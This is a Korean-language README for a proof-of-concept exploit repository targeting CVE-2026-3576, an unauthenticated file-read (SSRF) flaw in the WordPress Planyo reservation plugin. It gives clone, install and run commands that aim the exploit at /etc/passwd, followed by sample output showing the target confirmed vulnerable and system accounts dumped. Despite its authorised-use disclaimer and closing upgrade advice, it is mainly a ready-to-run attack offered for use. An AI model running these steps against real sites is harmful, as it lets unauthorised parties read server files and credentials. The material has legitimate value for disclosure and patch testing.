
CVE-2026-3576에 대한 개념 증명 익스플로잇
이 저장소는 CVE-2026-3576에 대한 Python 기반 PoC(Proof of Concept) 익스플로잇을 포함하고 있습니다. Exploit-DB에서도 확인할 수 있습니다 여기.
또한 이 익스플로잇에 대한 Metasploit 모듈도 개발했으며, 여기에서 확인할 수 있습니다.
이 프로젝트는 교육 목적과 승인된 보안 테스트를 위해서만 제공됩니다. 소유하지 않았거나 테스트 권한이 없는 시스템에 사용하지 마십시오.
WordPress의 Planyo Online Reservation System 플러그인 버전 3.1 이전에는 SSRF(Server Side Request Forgery) 취약점이 존재합니다. 이 취약점으로 인해 인증되지 않은 공격자가 ulap_url 매개변수를 통해 file://URL을 제공하여 임의 파일에 접근할 수 있습니다.
소스 코드 분석과 익스플로잇 시연이 포함된 상세한 분석 글은 제 Medium 블로그에서 확인할 수 있습니다.
| 구성 요소 | 버전 |
|---|
| 취약한 플러그인 | <=3.0 |
| 패치된 플러그인 | 3.1 |
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt
python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable
[*] Attempting to read arbitrary file...
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
플러그인을 버전 3.1로 업그레이드하십시오.